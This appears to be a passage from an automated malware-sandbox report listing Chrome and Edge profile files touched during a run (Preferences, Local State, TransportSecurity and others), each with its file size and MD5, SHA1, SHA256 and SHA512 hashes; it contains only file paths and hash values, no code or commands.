74adf81ea6fdc701c09bb115a0089ba43831c5b069d506f412d86fdb475f1cc2

SHA512
b1bf74e6d174ea2161d9a9707ce531025af094dac3e5ec94aedf3491b09c6af5174b80299aef297f4d001f60a6e2e525f9a5f4a238a2cd765026b9e00ea68df1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
11f6a7c59fecd68067c3f33948f08ba7

SHA1
d5c73389305a27a2f5e3de0f5c819d61448390bb

SHA256
fc795f3290eb29e159bc2998a42febb8c852d5853d6d90bc0877ab730bcb8e43

SHA512
d29d1bcea87bc4d492e560fa8415cd31f4e53599f8e0ea931608f1908965def0e2a9082cf9bdb5cf6ba14a12e953d9d8ed5b1d3b48b2b0ea885db3f919559130

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
b135157370fe5fe4de2b7ade57021c34

SHA1
922b60903d8eb04e08a3518c5865f09d8cb6697d

SHA256
24596c6126ea7840a06a79f2d23fc0292059180e7e47e55e9670e0d7dff3ec10

SHA512
0245737e77b65a207961c66856085b4717a42bdca58b6ad5ddbde00a2d53c7c8c18bf61bbef4a82cb0d5a2f66f6d6c038bbdd5696666d210bacfb12327bb7e78

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
6add517e18cdb711baa8d52ff7220b4d

SHA1
a7a646139a24c3db8fe1235d4b06c3ab57eb9ac3

SHA256
0ac7000922a419cabbfd16400e66847e458304258f90d0cc82b82fc002e0eb1c

SHA512
2b2c82256796495652194c8eab128c9ef9d43567c3862f3d7dfa47c663018e7ed0647f9c8650073ce5f0e8cf9affc9da8ca7d40b7551a06176fc37eebdd744f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
0fac6a7e85c77ea1f6ded125e2b81f65

SHA1
63541d9cdac4e67c7620c3f336896e1ac2d7f890

SHA256
8b01efc22648c8ebe95b75be2a828df68d22906125314b72cda7b89d3abc2c67

SHA512
c1def6c65e31eeaccbcc7e815f9ae7227717e2f55e15838e5a5f1776dfba9193d0dbf5b8754967a37cb1314728ececc678f0469e86f970948858dba82923453e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
12KB

MD5
bbaa99d85ad725dfe6bf4055bc8c8982

SHA1
143279586a1d354286507edff9b9ada1707f54bf

SHA256
1197d3a7ac649d36569c8a0991150b28599148a17d4df24492b9091d1e6a737a

SHA512
eceb19fcf02d95a5a2d7d1a974dc06b82b0ea889063eee4762900481c830ea0ea4014cd0e48561a6227a1a069a3c0f2f1830a7fbb62468cd8629ba8d27c6b129

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
5b9bcd1b3cd3d72766631a92b4488d45

SHA1
da3318a4ffb876c628b9fe20cbced74205f30225

SHA256
1562937c0e0f0a25e9e995c4f030ea3bd278f06d94c19403fc0e2566693da995

SHA512
31cd96c9f568a1eb73d25e12a0fb54450f5448be8e7084566a27974b0415f57788bd7586dd4009d109ca9f100d72630a5f3562c46d7fbf1f37644a66ed6b3cf1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
8b95166ab68efa9644d5f8aabb18606b

SHA1
3f76e91f87fa7d73765ad0deb1e2aa1b1a9a3218

SHA256
482fa6419c060ca2b56f0692255da48ac89c52b0d63762303f18b627d52ef667

SHA512
ce1979169f24af6bca3b4ca61ef245e3fb6bb3ae57992fe35f91f92aef2834a69a70a5ef9a17fce582fa4851b42d8179909d2d0fe92b3df51a2c394a915dda22

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_1

Filesize
264KB

MD5
57259c0103d803530204b56dd69c1744

SHA1
da7d0b988a80ce872f1dd8e610040ad9d449e3bb

SHA256
27d399098dc6a5965ab1e9c8a34d2ce0b64b68abf4aca4ddbd4174aed43afe35

SHA512
854a50a61a81cd26e0669b7d27dcecb61c9382c0172e8234fdca132aad35ce868a8da86c548d0accef6c252e147b09237f3e01e671962e6381d9d90aed35137e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
1ffde05098128824a7ab5840e175f73f

SHA1
ba1beabce4662ce101cab664ffec92d77bc59b0a

SHA256
5274d833a0beb2d598402037b55a28d36aa60bf1c888e7c4ddfed1f8b253ef98

SHA512
58ee205bb75f89f9c6d189a8fcdd8e668fd797888b3d75aabca06219b0dafac8b4118764d37b99c721c4408b2678028b693737d4086da8765bf7b8d6d15b26e5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
08962eb656c552beb012c8c6ceb564f9

SHA1
cab04e6e7a86b504215eb8eb9c5d08247d2b9fbe

SHA256
4a7e095e467082ae11fc4bf7807e07bb07b994df19ccee19c84506237e7abfcf

SHA512
6e89ec76a28328b34d68b8323a1bebeff33d1d14ce8e2316e1fe7219d548e26fa9d27dbd1cef0589fd55155f485b773dcf00f68e0b13080e4d51d8a5da6425fd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
354ea696b1081666e1866ef1796636b0

SHA1
399b7fb5a49fe0e753a564854ad799b07836fc67

SHA256
cf1d423c41b589503f0ee4ada3bc72e0fbf5655d10e88fba963f0a2f318ee07e

SHA512
7c36f588c7cf28e91b36f22b72a30a401d43bce97750d56bc9b92a118f6521802be584a7f227068b40ed2a607336093a8646756d0f66c7e4e79b1a6558695da1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
597ac3a29023ff7f619166a4a0fc191d

SHA1
88673edf959dba796c949b49cd7258186633387a

SHA256
f6d5065cec09513fa44ea0c95fcb896031d0d62ab02a5f7a3bfc8fa59fb9fb29

SHA512
86333fcf61ff019945bb6d43e830ad48d30c876c81d9e20be25301d42bf758152222ecd9f263ef2933d370f18af2bc9c48ed56902ecb02c38b05061c7cc0f97b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
8e62a4d3bf841a39e155728099a9f9e6

SHA1
3a5d181af4dc8c317a698838d18348c34420b19a

SHA256
e7b7e7607679893e2c2b2a8e29072524050746a665b73baab9c1b58db5991f2d

SHA512
efbf3a48ef999336c12d370c6f3192826b0ce0e8618000b2f85d74eb1c5c797acc0291b707ce6ea602fa0e12a806c7dfb453f082df93bd2b1007e25c8e015492

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
7429150f3061b01b45c5f2f2d9f06c59

SHA1
8e137f4d144087032e7f7fd60e296d19e08b7701

SHA256
e12fef8b4b241dc80a7a3ff55228279c1a6bed5365794a8117e031f54528ff9e

SHA512
8c8e573752c548f8d258fe59e7ddc7137090f24e2ce86731324c74ad71346647a0e744c00574273b1e8c32394bf970f9b6a7368e90b3f2bbfc5b87b5e00a4882

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
f487ee0c47971573404e0c74ed675e7e

SHA1
e0c52dbcd015935f1ec0b8dd2dd841471cc3b193

SHA256
83623b34ce079fcd6f3a2899148e234dcced8db8a332c9832f5110c39efc939f

SHA512
101b26ad3aeed96e85816d5b168f768a8626ee10fdd1a229649dbbd16da47e89b728eeaa04d1a36a970085b37b08c04c20a5c470601eeec176e2c314478fe965

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
37f660dd4b6ddf23bc37f5c823d1c33a

SHA1
1c35538aa307a3e09d15519df6ace99674ae428b

SHA256
4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

SHA512
807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7cb450b1315c63b1d5d89d98ba22da5

SHA1
694005cd9e1a4c54e0b83d0598a8a0c089df1556

SHA256
38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

SHA512
df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2dfbf141a7456384163d44bb888b9b2b

SHA1
75bf3f428abb99a4a933f2e69c1ff85fc68937a4

SHA256
aad010d165ab2d45719688984a7c580e590f3d743415a223c70ac42b65524492

SHA512
4f463f2a9c987e8c38df11d32fc2699fffe74d4753b9d3959fced8faddac323589625c5ceb7545ebd5e4dbaa83a7690efa3b3d494045d44e3666b88d5260f86f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b6b94f640ea33c284cbca4f1c5e6fb5b

SHA1
61b4b9e39b702e1a03c469ff251e892207799b00

SHA256
99cf20ebd49bc39fa6809e67327913e68e0dc4a5be7fc2dd41ad351fdd3967b9

SHA512
9527e72b0f3ea69f94bde193bc32f419ba5b63ae0829287d1589ec9ee0d373b64c177ce2db3031bc3858082ecdd4adf743ea4aec7c7f5e6b95389eb4de8ecc3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a4a4f894b30a13cb2405c7fcbe011b36

SHA1
a0bd7144804bb8e667282ff598ab05117ed9c78f

SHA256
715d0e923e3c4920118f8c67325548f9a3a2edbb1d8e95ff13380174b6a152e5

SHA512
01fa64d96408cfb722206af782b2332e3a2783eb00fdbc8d2b32ab77374e48d46d8f0347aec3705f3b7434d552b91f6c2e3b2bc8ee579fe59c3c854acd650361

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4f1dcfdc-5e8b-408c-9b03-9f1d5f02ed0c.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\1fe8f6d58f5ca6d9_0

Filesize
246B

MD5
397d2383ea399d1c026258ea37c9b649

SHA1
ffcc64bc916eac972d60d36de1a1350b28a3162e

SHA256
a2e44156d8c2fa1d05d380a0d0dcd1075c2a7b21e4af3c62ca3c588d4ec2a8c8

SHA512
b549addf50127cec1f1f6c3a41918acddb621322884b1b608948e6220355ee5f5d9da2171d8469b58ec064ef30e4b57892ad42fdcefab7f1b01100ae1e50858a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d8e7e1113418f967_0

Filesize
257B

MD5
807dafae58399286037e2bbd67a04911

SHA1
5e0443d80952809714f33504ba35d6e038078a04

SHA256
18d5187ee092001c0e1b0aa390d0f780867c17ff2297717fdc6d05dc2b3ba1ba

SHA512
e9f0890131823e7cecccd891d5a1d670a667dbe00fe8c3b6742cd15317ef5665eacf10edd439e2bf86194a6819e73efcd351af92fef5970ec4eb659c0f13121b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
323467e46ea991dd9faf57ab13df74df

SHA1
604410ca7a44d02c3b3ef1604c16a2dd728a5107

SHA256
6761700623a94875e7a027fed211cb67908ab41ad1a19adc80dca8478b1957d6

SHA512
e04dc00165baeaed80bc6e63a3f0cc1b866678f225cb12308469a6658068b35a8dc887c86dcc4e2ba22984df133f3e58914ec8ddb51200fc1707f2cf9c522f52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
67f6d11bbfe2453688f3fa7cd9f3c5c4

SHA1
3ed9a1a5b348c3952369c197e7d060e521281667

SHA256
0ef8c8d91a4849c14ac97ca4ed26f013a7ae3da85b7dec000016ac4ff1888b59

SHA512
393a8c71d981ee57b04a77c1af9009291fc41e05d751067f6d1493b0930f8ee1bf74a3bc0e899fab11397a4b516ed1570cadba7f3817bc8e194f413b049d7819

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
b2cb41935798fdbb650d9cd1a251be6c

SHA1
9fd996e4f8c009f36390091908b5548701429fd2

SHA256
a0d811379a87709a468a6007d9ebbe84aa6de1d85b30e31f10ba6ce7a0e6eb08

SHA512
7b9e8389594e3407c775216382de813ffeb945b0b1446abfc426a73de52050b12d6076867b0d63efb2e6fa0e936679c34572d978dd9b9bff8935f8c374399c1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
84ef982cf92c0505eb528ae2fb59353d

SHA1
c3e444b41586f8453787f06b789cb7f04335902a

SHA256
cf3d2f58defa6bf0d57d2d773bf7adb24545108fdd6012656a880240f1f203d1

SHA512
0f08765b636e90ddb15dfc3e9b8bf72a91323bc28362335595340aadd59ab2e8c3883bb6dd083af9faecac0d62d723dd081ff97490fe127e734e9093aae42e37

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
9KB

MD5
cd5b71ccf8c962e2a2a0ac5bc112f2bd

SHA1
1f5440294f09593d84e5e3cb63e953d90b7f74d2

SHA256
323de8b4bcdee81c543ff54907cd258df98cb5a02084a587a36f405927f7e8bf

SHA512
64944e8ab5f271133bdb236a17f0bc52a8ad6c0d3aeba84e8e60456d27f7172343ebaadc8ec514d8b251fe35ed54271d0012a8c2ec6e9948619217f92be78af3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
10KB

MD5
4d5a06f0cf586a5a5a24cad766fc1031

SHA1
0159fcff413ce0fe18367c0f9ecb18b0f67db11d

SHA256
2a7e5505afa599d5cfa69e95c4b8fade0ead8f67e51d1fa814e7dd2d4bf6f343

SHA512
17a8608b2e8cbe9414dc5228757c30706d465ae499d6d4d56602cd53d6ad1d347a2cda084859325cb8e5314c9f0c64616e5e6db057df25e3bf62d2bebba65ca0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
10KB

MD5
11f9c5a0b7eed0585679e99fdf895873

SHA1
e626b9bdd049a6825c2a2300783fb8154aa851ad

SHA256
46c6e5f45e72456d213494a22804b4341068efe197fc5ac7b574af01c35597db

SHA512
63fa45d13c466120572b3e1a412cae579125d1b78845e954ba23e7567c93fce966d129cdcfe37d68cd8ceed20694bfe323d250d3d3a62433cea8a1d2aeaf311a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
10KB

MD5
87ad61877e45a44da649a638ebf71439

SHA1
ad8db94009977cce12b094cfb0a3e5f88fe4a10a

SHA256
8a073f8903b1c33bcf5fe5b32162f2c24b71bfb995348ff5da525870248fde65

SHA512
4aa0fa733e3383d4402c6b33193c8a141dbc8302e55fe9e8c6aa64c1869cd3505767ebeb5ce3ebded1b3379a43657f76a460cf0a98dca793542a6a30773f2d00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
13KB

MD5
97eb8b3bd4cf42d31c09cffc8fea3161

SHA1
a31dcfabcd8a101ca70662dfb9bfb049d888d75f

SHA256
2d4eae51a674534ea435a563c6fa6a0ce22cd82dde02856156ea0bd4547aa5ad

SHA512
2856c547d61182f3704ee56e48c6bbfc67d9d27391f62da0906ce4561f39dc2f7b1daa8166f942ebde422a5f51311a5134e540c3381720aa6b4e0f8814860505

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
714695ae0911432627bdbd7511470a7f

SHA1
be0ab4b55392e1b0ecc412dcd0303468e49414df

SHA256
9de816f155aac6445c2aa7fad9a42c6a6276de4ae1d7f92577f7cfe5d1303003

SHA512
c7fd9f1e9409b4405c832a4cbacfe276d477e38bd359ef7ce4ae4ba7f438c17bf052986ea5674abf69974db232223d81229e54060c07cc0ff39c11e65ea43c64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
13KB

MD5
b9d7ae5a4539153eb1b0a84a4ffd43fd

SHA1
98b959d77df9aefbb48f4f7f4d245db65f0f6592

SHA256
9a28eb5d947080334d8e3789ac7279c642d31c1e154347a6694baa2a56a1706a

SHA512
6cbe1fd260a380bc12079c8c552029817aaeda8d601a932ac98d9ce5dfea56fe8f89f6c02d02a0144344e6956509ce1943c140d0a13a9783ef08e02a694d7456

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
13KB

MD5
8e646b567212b1e23f0ed13a2143c1ec

SHA1
077be97625deb851fbdc0a795febc3a8cfc17497

SHA256
ac92338c34aca95c53cfb9e3b41d6bc3d10ab296f7443802697492399ec243f7

SHA512
cac403206745ba30af52d3977b821a6e10dd013130fff880a8cd5fc2ea8347508f9bbf1053ef79bac3327b6b98e70f19a9aca9772485098cdd16f1f7c7882867

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
13KB

MD5
2fd18901f0ec2e226d8be25b7e9f3613

SHA1
c52da352d553b15c2fa7fbfab7920d4a81f7db12

SHA256
89d981b75caab316750590c182d94f4d1442eb20541ab1bb644044d017e8df57

SHA512
87091360fdc1dc787894367cd8783e8ac1deb1d81ac86db26389538095d8b4c1ab5aa8c9d4bba2ce60a2e30e416b63b67ccf244f4294010a1c372e2f6e588cec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
13KB

MD5
38c4ea20c6557c0c7cacef1b51f18a13

SHA1
8e7d93e8827d9a244fe2b7c4924bbb83f55e16f9

SHA256
82609981466e5fc2215edb48219bf79f62a86566d227a5ee97f6ce2ac80ba921

SHA512
224db4e6288444297023e2324c27b7cd5956533c0ad52de69fdc0f599114700cccc4425894dee4a82eae56ee43de149e87c498fc07a38096653048685aea794c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
13KB

MD5
e53679534815b388df7d5c5728eaba10

SHA1
5ac126ef39a1da5658e0966a6a664b7fbc6ef333

SHA256
608de5d683bfaad105469500c149b6c03762400b08d6baa2c34e9b32152bb04b

SHA512
6c82248bf1c47f1cb6c60d44cb7075744aa43df52d2daa6c3457c1309568ca3c3c129b410580050092609c792379d08ebac517e8881fbeba27e125b7be345936

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7e529402b27f62786803bc43239dd006

SHA1
6a33f40657bdb78a547b972b6cd04335f8d616d9

SHA256
d533694f2f6cb7ab89cb0f8ff1df1db8acad3a804524c282d7c0af4a41d38a94

SHA512
6e86bfd51f8df86269e29d091683acdde7d3002e3121a7368fafa49d3ac26d80b449ce811a53c001965c48b308c13f848c55e71f973740373488d089158c6ab1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
80c6eaa9fd3fefc7cd3a690296780584

SHA1
3874c1a1d6e43e7eb894130afa67728cd690bb45

SHA256
d3ca117e5935edd9a35ada847ccae934b38505c9098fc66f92940f396833c46e

SHA512
39bda4d62161f5770481010a2eb5eebc039425a47da7c67c2ac09be62920b398d4e8c75394d42769d4b05034b49c24d96b5d06c8a119dafb7d7a2703ea25bccd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
89406ced2451427eab9d5d2cd312a92d

SHA1
1a7f9fe67d7f2d37e3fbe30b5730a1174143ed92

SHA256
727b60fb09c7fd0b4c93a30bee74b1cc241917a46cbecb53a4642716801ea29b

SHA512
d89ce33bed416c596c0a36d83995df7e55859883b8d651c55a3d08b0e2baedd6b94d035d0f794ff5953cb99c4cd4802af74148f198fd0b8f9bdcac7433b0197e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
13KB

MD5
107f38c4b47ac36268f5e6e993a0db12

SHA1
8703f60c8909fa388c92cb63caf3e173dd425908

SHA256
bf96fa6a3db35532d5b9c112c34c18473ee0246ba1ecd88f80cae7cc42cf33a9

SHA512
18bb14bb00596874f4fac7626297e7b6363b862e58b560ab703e0dc3db7d68fa4e8b00193df050d98b4435801a973ffb9c3c994a03f58ca2c7a155fe0ce3ad6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
13KB

MD5
67eab2e8f526564b2139650bb473e5fe

SHA1
6723cc830dc531582cedd11e18897dae95bd9644

SHA256
ecf20aadd48ab9005e72dc38ea710d5a112cdbfd9899462725cc6d990e2c4758

SHA512
19d7ed3f98902cdb0e12a5301447c9f5a8f420824435e3f6b73da90db1688a55cc1bbca0c9b2af3d8776780347456a187e38019e8c73774a7ab171142ec9e964

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
13KB

MD5
f42e2a34191f8a24fb2b2b2a6186074e

SHA1
9f36373e541c925d196f8122d0774dc08f78d835

SHA256
23df611c16bd9fa0e75f959bd4557043e3b0e3dcc6df079c0fb7b4143d0b6795

SHA512
7631ad5739c0bd0ce636ddf73a353bc2e2609f3b2935c84697216661be967a2e1223a947668378aecdff9d7d5496578d18ff2c889248d0b6016fa2159680df2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
4eecbf813239c3f88503a7dc1a76efb6

SHA1
ebd928cf4ab8dd817491f76c2f36e2bd7ad23f59

SHA256
937ea2a2bf71396974ed73d7b464aeb70c2baf377cee928b906b742c6847eed5

SHA512
f515bb44396074a7067430d9c2c23d8630e60a632365b2bcf6e9096de39b7b063b5931d0eaaecaad8718377220e6f332105c0529fd1c9a3b43428cd6b54e33cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
3d1abd6ce7ed0265eea1aa66fdd74850

SHA1
1fb0f17907a850e6809d4a8a67f6a1c7617ce892

SHA256
aaa6f27a997b36a7d507fa5ce9eb19a8862b5ada73dd97e0bfc20e378f3344af

SHA512
a872db05e8aaaea24e3e8059d5e1dfb2754ba75b75ea799baa17de7acb600cf33d306080f0ee25b742ec46615911d59844031883d4954815651f79ef600d54c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
a4c82290d4b592d22b432b8ff538cb0f

SHA1
c26dbbb7cba22924df53317b2e93b00d28734054

SHA256
87d3ca44f9bb9e48eaedbc07f4be5d68cbf2cc7b977f176a8659591a6fb9c1a8

SHA512
9b3c5bd9f9aef0e42db45ee144dfff14ce252b9c86744421c624d38fb6aa322ad51030150e55a8aff6688694f9724733b893927070771fb717830074a39f6d6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
340804d05546f50507274666a3776283

SHA1
85f624ea5af2a37e2f4d95159fe8cc44ce5becf5

SHA256
993882995cceec2e6e87a36ee13167a45ca7f18f504e8317b6b29c41a8dd47a1

SHA512
e516ac45bf837a36a6aa01663056a2549825c6ff86afe22105d1b8850bd6200da4c1f90d7347d2d2f87b68938cf7a5a03ba51a1f47f3072f90e0712e17661202

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
f4654b5737c4d28dabd8e663adf7417e

SHA1
6cc1414d745afb010b9799c55fbabbb2fdf1bd0f

SHA256
a148de621a0e05f65f944886981490808636427e632cd0c6155efe3e08730bb8

SHA512
6601dde5beba987511f1916fd7e7ea44d6b574302e8536d63d279bed7cfc1c7225670a85a8c60c33574628adcf0afd9d1df6a59a4e126d32c227ddc4e63ea792

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
b2ae45fa522a1de295a05679e9d7d2b2

SHA1
a54b0c73e1dc0265130b580ac78f8f1184f2743f

SHA256
03a546f5001fc2daaf4845cbc843689e307c5c4c7070d77fbcdfb093d198260a

SHA512
770c35719c33f86e41ea9bf1bc68b355fd58d0def3dc8588a62084f80c28bd7237a40a72638ffbfb232ec5240e8a13a93722ab24704dbbfa69f5cd9dd5b88ec2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
256863564f3ab18ebc9e0ee9c884b6f1

SHA1
bc1c47b58ff7d7483f59ea436dc9085057087d14

SHA256
d238983d2e720885fab5bee4050667d00d1d7e7eaa60aa18d1ac86d3162af630

SHA512
65dd8f25fe5b8331a0ed0a789f59db24b2924263806cafdfb8b661f9473258edcb682533f317ee2c54836d3bc2fe7b8390ac411d9997d70638bddf26a0763379

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
6c1b58ce73c5a1de1d22a177514ac6d3

SHA1
97a589c2938e254601c7023253446b89b9fdf5a1

SHA256
7f1573c69f140ba49f3973416e323c9bd7c470b01916e95e49ca4701fd727982

SHA512
bead8c6a01c5a2d7f6bf179d5c901dfe6d1ec4f385f590f5b6edfa25d16a5604e198442fa897c3c7c91f407e669983da285b73408ef2d5afc28c6165106c4168

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
a7a452baba49038fcb63a14c4436c0ee

SHA1
d0f8fede42a9117f87f6627773a02a90e46e405e

SHA256
5ccc09e2ef2877f87bf745be5ecd623574902cefebbf39f83a0375f9cc1c5c68

SHA512
a603265fe03616912962337043c2a7629d3c5aecd7617de4daab99ddb21b8b4c5db6099feeda708bb593fc226ce9703a121bdd2fbf30a3ed59b9e604f6ee938f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
8873f4cff42648b4bae6590c26ccfcf8

SHA1
cdc88201f194ac20b7acfc70e293508414e8c306

SHA256
616cd26d898197d444ab61d6ea04d3527a40d78f6d949734f05a7507320b727d

SHA512
8139fe234805ef503e1f2af13f6d44fee538c74445563a1c3367864b5afd88fdc3b562fb7d2860849a670d850be7d710ba5f6891ff1b253a94d32b04a28fd945

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
a74ff1cf23cb2979f45be53d95ab519f

SHA1
d58d6038df474340a0949fc9eec23338870214dd

SHA256
95960a3c9673cf1129432743c1b948277f2291665765d201663d58ebf82b67c2

SHA512
bfafc94c16f6c4d6309506f98793ecdb35ecb4cf4dd6c34c48efc8f938dbb23651f1f85ba84a76a6b42de8c55962990dd5a6c11d4ca993bf56a1fa4ab32cd4a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5b8f6b.TMP

Filesize
204B

MD5
4cceaa2e067c8532c6ec6a3cd2378570

SHA1
e9a825e569007f9f52a322cc4d545a6e4955e079

SHA256
d38f618770c79e900274fe06f72e04e8e95b6374a8670f2f34a4bbb471c69a3e

SHA512
1d20cfb5e4e9654d32c2ee5eefa056ea8f66fcda5a1035831650a4efae093171fdebcf63697f893503ef803fe472a843e6eeed392d9bde3ff128851d21d45656

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a746b00d12afabc44c6e107928d5cb50

SHA1
1a9b88f38ef5e391e3539eb340c425683dc87da6

SHA256
d778ba121422b10644687c6fd27c1d78064a5c6ef3f6ef99531d77d02d9a29a9

SHA512
